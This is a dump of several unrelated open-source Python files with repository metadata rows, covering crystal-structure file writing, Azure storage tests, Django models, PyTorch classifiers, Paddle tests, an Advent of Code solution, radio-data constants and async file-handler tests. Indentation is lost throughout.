def _site_prop_keys_and_data(
self,
mol: IStructure,
data: OrderedDict
) -> str:
props_str = "species"
data["species"] = self._site_data_columns([str(site.specie) for site in mol])
props_str += ":" + data["species"].code + ":" + str(len(data["species"].width))
props_str += ":" + "pos"
data["pos"] = self._site_data_columns([site.coords for site in mol])
props_str += ":" + data["pos"].code + ":" + str(len(data["pos"].width))
for (key, val) in mol.site_properties.items():
key = self._site_prop_key(str(key))
props_str += ":" + key
data[key] = self._site_data_columns(val)
props_str += ":" + data[key].code + ":" + str(len(data[key].width))
# delimit properties value with quotes in case property keys include space(s):
if re.match("[ ]+", props_str):
props_str = '"' + props_str + '"'
return "Properties=" + props_str
def _frame_prop_key(
self,
key: str
) -> str:
key = re.sub(self._frame_prop_key_sanitize_match, "", str(key))
return key
def _frame_prop_val(
self,
val: str
) -> str:
val = re.sub(self._frame_prop_val_sanitize_match, "", str(val))
if re.search("[ ]+", val):
val = '"' + val + '"'
return val
def _val2propval(
self,
val: Any
) -> str:
code = self._code(val)
if code == "R":
val = self._fmt_float.format(val)
elif code == "L":
val = "T" if val else "F"
else:
val = self._frame_prop_val(str(val))
return val
def _get_commentline_and_data(
self,
mol: IStructure,
data: OrderedDict,
props: Dict
) -> str:
com_str = 'Lattice="' + " ".join(
self._fmt_float.format(x) for x in mol.lattice.matrix.flat
) + '"'
com_str += " " + self._site_prop_keys_and_data(mol, data)
if props:
for (key, val) in props.items():
if not isinstance(key, str):
raise TypeError("non-string frame property key")
key = self._frame_prop_key(key)
com_str += " " + key
com_str += "=" + self._val2propval(val)
return com_str
def _compile_data_lines(
self,
data: OrderedDict
) -> List[str]:
if not len(set(len(col.data) for col in data.values())) == 1:
raise ValueError("inconsistent amount of properties given.")
prop, col = data.popitem(last=False)
lines = [" ".join(f.rjust(w) for (f,w) in zip(fields, col.width)) for fields in col.data]
for col in data.values():
lines = map(
add,
lines,
[" " + " ".join(f.rjust(w) for (f,w) in zip(fields,col.width)) for fields in col.data]
)
return lines
def _frame_str(
self,
mol: Union[IMolecule, IStructure],
props: Dict = None
) -> str:
if not mol.lattice:
lat = Lattice.cubic(2.*mol.distance_matrix.max())
center = lat.get_cartesian_coords([.5,.5,.5])
mol = IStructure(
lat,
[s.specie for s in mol],
[s.coords - mol.center_of_mass + center for s in mol],
coords_are_cartesian=True,
site_properties=mol.site_properties
)
output = [str(mol.num_sites)]
data = OrderedDict()
output.append(self._get_commentline_and_data(mol, data, props))
output.extend(self._compile_data_lines(data))
return "\n".join(output)
def __str__(self) -> str:
return "\n".join(self._frame_str(m, p) for m, p in zip(self._mols, self._mols_props))
| 32.534632
| 114
| 0.534296
|
acff7adc4d0ae4b4281f9f2211f3a987d20bbc2e
| 8,246
|
py
|
Python
|
tools/c7n_azure/tests_azure/test_storageutils.py
|
blade2005/cloud-custodian
|
21ecdd60ae8a78887cf9d135367b283ce88b0fd9
|
[
"Apache-2.0"
] | null | null | null |
tools/c7n_azure/tests_azure/test_storageutils.py
|
blade2005/cloud-custodian
|
21ecdd60ae8a78887cf9d135367b283ce88b0fd9
|
[
"Apache-2.0"
] | null | null | null |
tools/c7n_azure/tests_azure/test_storageutils.py
|
blade2005/cloud-custodian
|
21ecdd60ae8a78887cf9d135367b283ce88b0fd9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from azure.common import AzureHttpError
from azure.mgmt.storage.models import StorageAccountListKeysResult, StorageAccountKey
from azure.storage.common import TokenCredential
from .azure_common import BaseTest, arm_template, requires_arm_polling
from c7n_azure.session import Session
from c7n_azure.storage_utils import StorageUtilities
from c7n_azure.utils import ResourceIdParser
from mock import patch
from c7n.utils import local_session
@requires_arm_polling
class StorageUtilsTest(BaseTest):
def setUp(self):
super(StorageUtilsTest, self).setUp()
self.session = Session()
StorageUtilities.get_storage_from_uri.cache_clear()
@arm_template('storage.json')
def test_get_storage_client_by_uri(self):
account = self.setup_account()
url = "https://" + account.name + ".blob.core.windows.net/testcontainer/extrafolder"
blob_service, container_name, key_prefix = \
StorageUtilities.get_blob_client_by_uri(url, self.session)
self.assertIsNotNone(blob_service)
self.assertEqual(container_name, "testcontainer")
self.assertEqual(key_prefix, "extrafolder")
@arm_template('storage.json')
def test_get_storage_client_by_uri_extra_directories(self):
account = self.setup_account()
url = "https://" + account.name + \
".blob.core.windows.net/testcontainer/extrafolder/foo/bar"
blob_service, container_name, key_prefix = \
StorageUtilities.get_blob_client_by_uri(url, self.session)
self.assertIsNotNone(blob_service)
self.assertEqual(container_name, "testcontainer")
self.assertEqual(key_prefix, "extrafolder/foo/bar")
@arm_template('storage.json')
def test_get_queue_client_by_uri(self):
account = self.setup_account()
url = "https://" + account.name + ".queue.core.windows.net/testcc"
queue_service, queue_name = StorageUtilities.get_queue_client_by_uri(url, self.session)
self.assertIsNotNone(queue_service)
self.assertEqual(queue_name, "testcc")
def test_get_queue_client_expired_token(self):
"""
Exception handler should deal with a bad token by clearing
cache and retrying. So if we provide a bad token followed
by a real one in our mock, we expect it to end up getting
the real token.
"""
real_token = StorageUtilities.get_storage_token(self.session)
with patch('c7n_azure.storage_utils.QueueService.create_queue') as create_mock:
with patch('c7n_azure.storage_utils.StorageUtilities.get_storage_token') as token_mock:
error = AzureHttpError('', 403)
error.error_code = 'AuthenticationFailed'
# Two side effects: one with a bad token and an error,
# and one with a good token and no error
create_mock.side_effect = [error, None]
token_mock.side_effect = [TokenCredential('fake'), real_token]
url = "https://fake.queue.core.windows.net/testcc"
queue_service, queue_name = \
StorageUtilities.get_queue_client_by_uri(url, self.session)
# We end up with the real token (after a retry)
self.assertEqual(real_token, queue_service.authentication)
@arm_template('storage.json')
def test_create_delete_queue_from_storage_account(self):
account = self.setup_account()
queue_name = 'testqueuecc'
queue = \
StorageUtilities.create_queue_from_storage_account(account, queue_name, self.session)
self.assertTrue(queue)
result = \
StorageUtilities.delete_queue_from_storage_account(account, queue_name, self.session)
self.assertTrue(result)
@arm_template('storage.json')
def test_cycle_queue_message_by_uri(self):
account = self.setup_account()
url = "https://" + account.name + ".queue.core.windows.net/testcyclemessage"
queue_settings = StorageUtilities.get_queue_client_by_uri(url, self.session)
StorageUtilities.put_queue_message(*queue_settings, content=u"hello queue")
# Pull messages, should be 1
messages = StorageUtilities.get_queue_messages(*queue_settings)
self.assertEqual(len(messages), 1)
# Read message and delete it from queue
for message in messages:
self.assertEqual(message.content, u"hello queue")
StorageUtilities.delete_queue_message(*queue_settings, message=message)
# Pull messages again, should be empty
messages = StorageUtilities.get_queue_messages(*queue_settings)
self.assertEqual(len(messages), 0)
@arm_template('storage.json')
def test_get_storage_token(self):
token = StorageUtilities.get_storage_token(self.session)
self.assertIsNotNone(token.token)
def test_get_storage_primary_key(self):
key1 = StorageAccountKey()
key1.key_name = "key1"
key1.value = "mock_storage_key"
data = StorageAccountListKeysResult()
data.keys = [key1]
with patch(self._get_storage_client_string() + '.list_keys', return_value=data) \
as list_keys_mock:
primary_key = StorageUtilities.get_storage_primary_key(
'mock_rg_group', 'mock_account', self.session)
list_keys_mock.assert_called_with('mock_rg_group', 'mock_account')
self.assertEqual(primary_key, data.keys[0].value)
@arm_template('storage.json')
def test_get_blob_client_from_storage_account_without_sas(self):
account = self.setup_account()
resource_group = ResourceIdParser.get_resource_group(account.id)
blob_client = StorageUtilities.get_blob_client_from_storage_account(
resource_group,
account.name,
self.session)
self.assertIsNotNone(blob_client)
@arm_template('storage.json')
def test_get_blob_client_from_storage_account_without_sas_fails_sas_generation(self):
with self.assertRaises(ValueError):
account = self.setup_account()
resource_group = ResourceIdParser.get_resource_group(account.id)
blob_client = StorageUtilities.get_blob_client_from_storage_account(
resource_group,
account.name,
self.session)
# create container for package
blob_client.create_container('test')
blob_client.create_blob_from_text('test', 'test.txt', 'My test contents.')
blob_client.generate_blob_shared_access_signature('test', 'test.txt')
@arm_template('storage.json')
def test_get_blob_client_from_storage_account_with_sas(self):
account = self.setup_account()
resource_group = ResourceIdParser.get_resource_group(account.id)
blob_client = StorageUtilities.get_blob_client_from_storage_account(
resource_group,
account.name,
self.session,
True)
# create sas token for blob
blob_client.create_container('test')
blob_client.create_blob_from_text('test', 'test.txt', 'My test contents.')
sas = blob_client.generate_blob_shared_access_signature('test', 'test.txt')
self.assertIsNotNone(sas)
def _get_storage_client_string(self):
client = local_session(Session)\
.client('azure.mgmt.storage.StorageManagementClient').storage_accounts
return client.__module__ + '.' + client.__class__.__name__
| 42.725389
| 99
| 0.697187
|
acff7c39949a3dd25a3fb5485c3957c490664e2b
| 2,615
|
py
|
Python
|
app/core/models.py
|
Robooto/recipe-app-api
|
ab53c2a37f51031d8048570ee5b05bd6a26a284c
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
Robooto/recipe-app-api
|
ab53c2a37f51031d8048570ee5b05bd6a26a284c
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
Robooto/recipe-app-api
|
ab53c2a37f51031d8048570ee5b05bd6a26a284c
|
[
"MIT"
] | null | null | null |
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Create and saves a new user."""
if not email:
raise ValueError('Users must have an email address.')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Create and saves a super user"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used with a recipe."""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredient to be used in a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
| 28.736264
| 76
| 0.671511
|
acff7c42390735abc5226c8b99d6083de7639f59
| 4,501
|
py
|
Python
|
extrinsic/bios_codes/models.py
|
MSR-LIT/MultilingualBias
|
37dbc7ff4ec2d35edd4f3fe19feb872f2dde128e
|
[
"MIT"
] | 2
|
2020-07-15T04:18:20.000Z
|
2020-08-03T02:50:21.000Z
|
extrinsic/bios_codes/models.py
|
MSR-LIT/MultilingualBias
|
37dbc7ff4ec2d35edd4f3fe19feb872f2dde128e
|
[
"MIT"
] | null | null | null |
extrinsic/bios_codes/models.py
|
MSR-LIT/MultilingualBias
|
37dbc7ff4ec2d35edd4f3fe19feb872f2dde128e
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn.functional as F
from rnn_encoder import GRUEncoder
from utils import get_sequences_lengths, softmax_masked, to_device
class CountsModel(torch.nn.Module):
def __init__(self, input_size, output_size, dropout):
super().__init__()
self.input_size = input_size
self.output_size = output_size
self.dropout = dropout
self.classifier = torch.nn.Linear(input_size, output_size)
def forward(self, inputs):
if self.dropout != 0:
inputs = F.dropout(inputs, self.dropout, self.training)
logits = self.classifier(inputs)
return logits
class RNNModel(torch.nn.Module):
def __init__(self, embedding_size, vocab_size, trainable_embeddings, hidden_size, output_size, dropout, W_emb=None,
padding_idx=0):
super().__init__()
self.hidden_size = hidden_size
self.dropout = dropout
self.padding_idx = padding_idx
self.embedding = torch.nn.Embedding(vocab_size, embedding_size, padding_idx=padding_idx)
if W_emb is not None:
self.embedding.weight.data.copy_(torch.from_numpy(W_emb))
if not trainable_embeddings:
self.embedding.weight.requires_grad = False
self.encoder_sentences = GRUEncoder(embedding_size, hidden_size, bidirectional=True, return_sequence=False)
self.out = torch.nn.Sequential(
torch.nn.Linear(hidden_size * 2, output_size),
)
def zero_state(self, batch_size):
state_shape = (2, batch_size, self.hidden_size)
# will work on both GPU and CPU in contrast to just Variable(*state_shape)
h = to_device(torch.zeros(*state_shape))
return h
def encode(self, inputs):
inputs_len = get_sequences_lengths(inputs)
inputs_emb = self.embedding(inputs)
inputs_enc = self.encoder_sentences(inputs_emb, inputs_len)
inputs_enc = F.dropout(inputs_enc, self.dropout, self.training)
return inputs_enc
def get_logits(self, inputs_att):
logits = self.out(inputs_att)
return logits
def forward(self, inputs):
inputs_enc = self.encode(inputs)
logits = self.get_logits(inputs_enc)
return logits
class HANModel(torch.nn.Module):
def __init__(self, embedding_size, vocab_size, trainable_embeddings, hidden_size, attention_size, output_size, dropout, W_emb=None,
padding_idx=0):
super().__init__()
self.padding_idx = padding_idx
self.dropout = dropout
self.hidden_size = hidden_size
self.embedding = torch.nn.Embedding(vocab_size, embedding_size, padding_idx=padding_idx)
if W_emb is not None:
self.embedding.weight.data.copy_(torch.from_numpy(W_emb))
if not trainable_embeddings:
self.embedding.weight.requires_grad = False
self.encoder_sentences = GRUEncoder(embedding_size, hidden_size, bidirectional=True,
return_sequence=True)
self.att_sentences = torch.nn.Linear(hidden_size * 2, attention_size)
self.att_reduce = torch.nn.Linear(attention_size, 1, bias=False)
self.out = torch.nn.Sequential(
torch.nn.Linear(hidden_size * 2, output_size),
)
def zero_state(self, batch_size):
state_shape = (2, batch_size, self.hidden_size)
# will work on both GPU and CPU in contrast to just Variable(*state_shape)
h = to_device(torch.zeros(*state_shape))
return h
def encode_sentences(self, inputs):
mask = inputs != self.padding_idx
inputs_len = get_sequences_lengths(inputs)
inputs_emb = self.embedding(inputs)
inputs_enc = self.encoder_sentences(inputs_emb, inputs_len)
inputs_enc = F.dropout(inputs_enc, self.dropout, self.training)
mask = mask[:, :inputs_enc.size(1)]
att_vec = self.att_sentences(inputs_enc)
att_weights = self.att_reduce(att_vec)
att = softmax_masked(att_weights, mask.unsqueeze(-1))
inputs_att = torch.sum(inputs_enc * att, dim=1)
inputs_att = F.dropout(inputs_att, self.dropout, self.training)
return inputs_att, att
def get_logits(self, inputs_att):
logits = self.out(inputs_att)
return logits
def forward(self, inputs):
inputs_att, att = self.encode_sentences(inputs)
logits = self.get_logits(inputs_att)
return logits
| 33.589552
| 135
| 0.666741
|
acff7daadeb33114646398a0a78250535e73f3aa
| 2,090
|
py
|
Python
|
python/paddle/fluid/tests/unittests/test_nn_functional_embedding_dygraph.py
|
zmxdream/Paddle
|
04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c
|
[
"Apache-2.0"
] | 17,085
|
2016-11-18T06:40:52.000Z
|
2022-03-31T22:52:32.000Z
|
python/paddle/fluid/tests/unittests/test_nn_functional_embedding_dygraph.py
|
zmxdream/Paddle
|
04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c
|
[
"Apache-2.0"
] | 29,769
|
2016-11-18T06:35:22.000Z
|
2022-03-31T16:46:15.000Z
|
python/paddle/fluid/tests/unittests/test_nn_functional_embedding_dygraph.py
|
zmxdream/Paddle
|
04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c
|
[
"Apache-2.0"
] | 4,641
|
2016-11-18T07:43:33.000Z
|
2022-03-31T15:15:02.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle
import paddle.nn as nn
import numpy as np
paddle.disable_static()
class EmbeddingDygraph(unittest.TestCase):
def test_1(self):
x_data = np.arange(3, 6).reshape((3, 1)).astype(np.int64)
paddle.disable_static(paddle.CPUPlace())
x = paddle.to_tensor(x_data, stop_gradient=False)
embedding = paddle.nn.Embedding(10, 3, sparse=True, padding_idx=9)
w0 = np.full(shape=(10, 3), fill_value=2).astype(np.float32)
embedding.weight.set_value(w0)
adam = paddle.optimizer.Adam(
parameters=[embedding.weight], learning_rate=0.01)
adam.clear_grad()
out = embedding(x)
out.backward()
adam.step()
def test_2(self):
x_data = np.arange(3, 6).reshape((3, 1)).astype(np.int64)
y_data = np.arange(6, 12).reshape((3, 2)).astype(np.float32)
paddle.disable_static(paddle.CPUPlace())
x = paddle.to_tensor(x_data, stop_gradient=False)
y = paddle.to_tensor(y_data, stop_gradient=False)
with self.assertRaises(ValueError):
embedding = paddle.nn.Embedding(10, 3, padding_idx=11, sparse=True)
with self.assertRaises(ValueError):
embedding = paddle.nn.Embedding(-1, 3, sparse=True)
with self.assertRaises(ValueError):
embedding = paddle.nn.Embedding(10, -3, sparse=True)
if __name__ == '__main__':
unittest.main()
| 32.65625
| 79
| 0.681818
|
acff7e2968664548bce9de246ff305a07ad5aff7
| 511
|
py
|
Python
|
2020/Python/day10/part1.py
|
tymscar/Advent-Of-Code
|
cd7b96b0253191e236bd704b0d8b5540fb3e8ef6
|
[
"MIT"
] | 4
|
2019-12-08T08:20:53.000Z
|
2021-12-17T12:04:11.000Z
|
2020/Python/day10/part1.py
|
tymscar/AdventOfCode2018
|
9742ddb6bbbc917062baad87d6b6de75375f1ae8
|
[
"MIT"
] | null | null | null |
2020/Python/day10/part1.py
|
tymscar/AdventOfCode2018
|
9742ddb6bbbc917062baad87d6b6de75375f1ae8
|
[
"MIT"
] | 4
|
2020-12-11T22:10:24.000Z
|
2021-12-25T22:39:05.000Z
|
def part_1():
file = open('input.txt', 'r')
jolts = [0]
highest = 0
one_jumps = 0
three_jumps = 0
for line in file:
line = line.strip("\n")
jolts.append(int(line))
highest = max(highest, int(line))
jolts.append(highest + 3)
jolts = sorted(jolts)
for i in range(len(jolts)-1):
if jolts[i+1] - jolts[i] == 1:
one_jumps += 1
else:
three_jumps += 1
return one_jumps * three_jumps
print(part_1())
| 18.925926
| 41
| 0.518591
|
acff7e50f2e8e7b11748227837aac0ed14a416a2
| 6,662
|
py
|
Python
|
rfpye/constants.py
|
ronaldokun/rfpye
|
cff49b03887166740bf3b1da40913e22b6523ef2
|
[
"Apache-2.0"
] | null | null | null |
rfpye/constants.py
|
ronaldokun/rfpye
|
cff49b03887166740bf3b1da40913e22b6523ef2
|
[
"Apache-2.0"
] | 7
|
2021-06-03T18:47:23.000Z
|
2021-10-31T23:41:39.000Z
|
rfpye/constants.py
|
ronaldokun/rfpye
|
cff49b03887166740bf3b1da40913e22b6523ef2
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/04_constants.ipynb (unless otherwise specified).
__all__ = ['BYTES_HEADER', 'ENDMARKER', 'EXCLUDE_ATTRS', 'DICT_PROCESSING', 'DICT_UNIT', 'TUNING_BLOCK', 'BYTES_TIMED',
'BYTES_TIMED_NE', 'BYTES_6', 'BYTES_20', 'BYTES_21', 'BYTES_24', 'BYTES_40', 'BYTES_41', 'BYTES_42',
'BYTES_51', 'BYTES_64', 'BYTES_65', 'BYTES_V5', 'BYTES_66', 'BYTES_67', 'KEY_ATTRS', 'TIMED_BLOCKS',
'SPECTRAL_BLOCKS', 'OCC', 'VECTOR_BLOCKS', 'UNCOMPRESSED', 'COMPRESSED', 'GPS_BLOCK', 'BLOCK_ATTRS']
# Cell
from typing import Mapping, List, Tuple
# Cell
BYTES_HEADER = 36
ENDMARKER: bytes = b"UUUU"
EXCLUDE_ATTRS: List = (
"count",
"index",
"checksum",
"default",
"walldate",
"walltime",
"wallnano",
"wallclock_datetime",
"timestamp",
"data",
"raw_data",
"levels",
"matrix",
"frequencies",
"agc",
"tunning",
)
DICT_PROCESSING: Mapping[int, str] = {
0: "single measurement",
1: "average",
2: "peak",
3: "minimum",
}
DICT_UNIT: Mapping[int, str] = {0: "dBm", 1: "dBμV/m"}
TUNING_BLOCK: Mapping[int, str] = {
0: "completed without error",
1: "error occurred",
2: "radio produced an error",
3: "GPRS transmission occured during capture",
4: "ADC overflowed during capture",
}
BYTES_TIMED: Mapping[int, slice] = {
0: slice(0, 4),
1: slice(4, 8),
2: slice(8, 12),
3: slice(12, 14),
4: slice(14, 18),
5: slice(18, 20),
6: slice(20, 24),
7: slice(24, 26),
8: slice(26, 28),
}
BYTES_TIMED_NE: Mapping[int, slice] = {0: slice(0, 4), 1: slice(4, 8), 2: slice(8, 12)}
BYTES_6: Mapping[int, slice] = {
0: slice(0, 4),
1: slice(4, 8),
2: slice(8, 12),
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 24),
}
BYTES_20: Mapping[int, slice] = {
0: slice(0, 4),
1: slice(4, 8),
2: slice(8, 12),
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 24),
6: slice(24, 28),
7: slice(28, 32),
8: slice(32, 36),
9: slice(36, 40),
}
BYTES_21: Mapping[int, slice] = {0: slice(0, 16), 1: slice(16, 20)}
BYTES_24: Mapping[int, slice] = {0: slice(0, 4), 1: slice(4, 8)}
BYTES_40: Mapping[int, slice] = {
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 21),
6: slice(21, 22),
7: slice(22, 24),
8: slice(24, 28),
9: slice(28, 32),
10: slice(32, 36),
11: slice(36, 40),
}
BYTES_41: Mapping[int, slice] = {3: slice(12, 44), 4: slice(44, 48)}
BYTES_42: Mapping[int, slice] = {
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 52),
6: slice(52, 56),
}
BYTES_51: Mapping[int, slice] = {5: slice(20, 24)}
BYTES_64: Mapping[int, slice] = {22: slice(52, 56), 23: slice(56, 60)}
BYTES_65: Mapping[int, slice] = {
9: slice(28, 32),
10: slice(32, 33),
11: slice(33, 34),
12: slice(34, 36),
13: slice(36, 37),
14: slice(37, 38),
15: slice(38, 39),
16: slice(39, 40),
17: slice(40, 42),
18: slice(42, 44),
19: slice(44, 48),
}
BYTES_V5: Mapping[int, slice] = {3: slice(12, 16), 4: slice(16, 20), 5: slice(20, 24)}
BYTES_66: Mapping[int, slice] = {3: slice(12, 16), 4: slice(16, 20), 5: slice(20, 24)}
BYTES_67: Mapping[int, slice] = {3: slice(12, 16), 4: slice(16, 20), 5: slice(20, 24)}
# Cell
KEY_ATTRS = {
3: ('description',),
4: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"ndata",
"processing",
),
5: (),
6: (),
7: (
"type",
"thread_id",
"thresh",
"minimum",
"start_mega",
"stop_mega",
"ndata",
),
8: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"sampling",
"ndata",
),
20: (
"n_spectral_blocks",
"nddt",
),
21: ("hostname", "method", "unit_info", "file_number"),
22: ('description',),
23: (),
24: ('description',),
40: ("gps_status",),
41: ("identifier",),
42: ("identifier",),
51: (),
60: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"ndata",
"nloops",
"processing",
"antuid",
),
61: (
"type",
"thread_id",
"thresh",
"minimum",
"start_mega",
"stop_mega",
"ndata",
"nloops",
"processing",
"antuid",
),
62: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"thresh",
"sampling",
"ndata",
"antuid",
),
63: (
"type",
"thread_id",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"processing",
"antuid",
),
64: (
"type",
"thread_id",
"thresh",
"minimum",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"processing",
"antuid",
),
65: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"processing",
"antuid",
),
67: (
"type",
"thread_id",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"bw",
"processing",
"antuid",
),
68: (
"type",
"thread_id",
"thresh",
"description",
"start_mega",
"stop_mega",
"minimum",
"dtype",
"ndata",
"bw",
"processing",
"antuid",
),
69: (
"type",
"thread_id",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"bw",
"opcount",
"antuid",
),
}
TIMED_BLOCKS = (40, 41, 42, 51, 63, 64, 65, 66, 67, 68, 69)
SPECTRAL_BLOCKS = (4, 7, 60, 61, 63, 64, 67, 68)
OCC = (8, 62, 65, 69)
VECTOR_BLOCKS = SPECTRAL_BLOCKS + OCC
UNCOMPRESSED = (4, 60, 63, 67) + OCC
COMPRESSED = (7, 61, 64, 68)
GPS_BLOCK = 40
BLOCK_ATTRS: Mapping[int, Tuple] = {
8: ("wallclock_datetime"),
21: (),
40: (
"gps_datetime",
"latitude",
"longitude",
"altitude",
"num_satellites",
),
41: (),
42: (),
60: ("wallclock_datetime"),
61: ("wallclock_datetime"),
62: ("wallclock_datetime"),
63: ("wallclock_datetime"),
64: ("wallclock_datetime"),
65: ("wallclock_datetime"),
67: ("wallclock_datetime"),
68: ("wallclock_datetime"),
69: ("wallclock_datetime"),
}
| 20.689441
| 119
| 0.487241
|
acff7e7d25bf5fa845cb3a21f14dd5a94841b5c4
| 5,565
|
py
|
Python
|
tests/test_files_handler.py
|
skivis/BlackSheep
|
486f04ba2045f31dd3e188f52c45a275eb150967
|
[
"MIT"
] | 482
|
2018-12-20T09:30:23.000Z
|
2021-02-08T18:34:16.000Z
|
tests/test_files_handler.py
|
skivis/BlackSheep
|
486f04ba2045f31dd3e188f52c45a275eb150967
|
[
"MIT"
] | 125
|
2021-02-15T09:29:51.000Z
|
2022-03-25T19:48:23.000Z
|
tests/test_files_handler.py
|
skivis/BlackSheep
|
486f04ba2045f31dd3e188f52c45a275eb150967
|
[
"MIT"
] | 27
|
2021-03-20T16:17:58.000Z
|
2022-03-02T19:37:42.000Z
|
import asyncio
import os
import pathlib
import shutil
from uuid import uuid4
import pytest
from blacksheep.common.files.asyncfs import FileContext, FilesHandler
@pytest.fixture()
def files_folder():
return pathlib.Path(__file__).parent.absolute() / "files"
@pytest.fixture(scope="module")
def temp_files_folder():
temp_folder = pathlib.Path(__file__).parent.absolute() / ".out"
if not temp_folder.exists():
os.makedirs(temp_folder)
yield temp_folder
shutil.rmtree(temp_folder)
@pytest.mark.asyncio
@pytest.mark.parametrize(
"file_name", ["example.txt", "pexels-photo-126407.jpeg", "README.md"]
)
async def test_read_file(files_folder: pathlib.Path, file_name: str):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
contents = await handler.read(full_file_path)
with open(full_file_path, mode="rb") as f:
expected_contents = f.read()
assert contents == expected_contents
@pytest.mark.asyncio
@pytest.mark.parametrize("file_name", ["example.txt", "README.md"])
async def test_read_file_rt_mode(files_folder: pathlib.Path, file_name: str):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
contents = await handler.read(full_file_path, mode="rt")
with open(full_file_path, mode="rt") as f:
expected_contents = f.read()
assert contents == expected_contents
@pytest.mark.asyncio
@pytest.mark.parametrize(
"file_name", ["example.txt", "pexels-photo-126407.jpeg", "README.md"]
)
async def test_read_file_with_open(files_folder: pathlib.Path, file_name: str):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
async with handler.open(full_file_path) as file_context:
contents = await file_context.read()
with open(full_file_path, mode="rb") as file:
expected_contents = file.read()
assert contents == expected_contents
@pytest.mark.asyncio
@pytest.mark.parametrize(
"file_name,index,size",
[
["example.txt", 0, 10],
["example.txt", 10, 10],
["example.txt", 5, 15],
["README.md", 0, 10],
["README.md", 10, 10],
["README.md", 5, 15],
],
)
async def test_seek_and_read_chunk(
files_folder: pathlib.Path, file_name: str, index: int, size: int
):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
async with handler.open(full_file_path) as file_context:
await file_context.seek(index)
chunk_read_async = await file_context.read(size)
with open(full_file_path, mode="rb") as file:
file.seek(index)
chunk_read = file.read(size)
assert chunk_read_async == chunk_read
@pytest.mark.asyncio
@pytest.mark.parametrize(
"file_name", ["example.txt", "pexels-photo-126407.jpeg", "README.md"]
)
async def test_read_file_chunks(files_folder: pathlib.Path, file_name: str):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
chunk: bytes
chunk_size = 1024
contents = b""
expected_contents = b""
async with handler.open(full_file_path) as file_context:
async for chunk in file_context.chunks(chunk_size):
assert chunk is not None
contents += chunk
with open(full_file_path, mode="rb") as f:
while True:
chunk = f.read(chunk_size)
if not chunk:
break
expected_contents += chunk
assert contents == expected_contents
@pytest.mark.asyncio
async def test_write_file(temp_files_folder: pathlib.Path):
handler = FilesHandler()
file_name = str(uuid4()) + ".txt"
full_file_path = str(temp_files_folder / file_name)
contents = b"Lorem ipsum dolor sit"
await handler.write(full_file_path, contents)
with open(full_file_path, mode="rb") as f:
expected_contents = f.read()
assert contents == expected_contents
@pytest.mark.asyncio
async def test_write_file_text_mode(temp_files_folder: pathlib.Path):
